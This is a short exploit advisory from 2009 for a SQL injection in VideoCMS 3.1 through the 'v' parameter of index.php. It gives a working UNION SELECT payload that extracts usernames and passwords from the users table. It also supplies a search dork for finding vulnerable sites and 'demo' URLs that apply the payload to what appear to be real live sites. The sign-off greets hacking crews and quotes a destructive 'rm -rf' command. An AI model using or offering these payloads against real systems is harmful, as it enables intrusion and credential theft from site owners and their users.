################################################################################### # [~] VideoCMS SQL injection vulnerability - (id) # [~] Author : kaMtiEz (kamzcrew@gmail.com) # [~] Homepage : http://www.indonesiancoder.com # [~] Date : Desember 14, 2009 # # ################################################################################### [ Software Information ] [+] Vendor : http://www.codemight.com/ [+] Download : - [+] version : 3.1 or lower maybe also affected [+] Vulnerability : SQL injection [+] Dork : "Think iT" [+] Price : dunno [+] Location : INDONESIA - JOGJA [+] description http://www.codemight.com/index.php?m=product&p=1 ################################################################################## [ HERE WE GO .. LIVE FROM JOGJA CITY ] [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL] [ Exploit ] /**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users-- [ Demo ] http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users-- http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users-- =========================================================================== [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry .. [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader, [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Nyak ama babe gua .. tak lupa adik gua .. [+] segelas vodka menemaniku setiap malam .. :P [+] Dengerin Radio yach di http://antisecradio.fm ok coy ? [ QUOTE ] [+] rm -rf [ EOF ] [+] INDONESIANOCODER TEAM [+] KILL -9 TEAM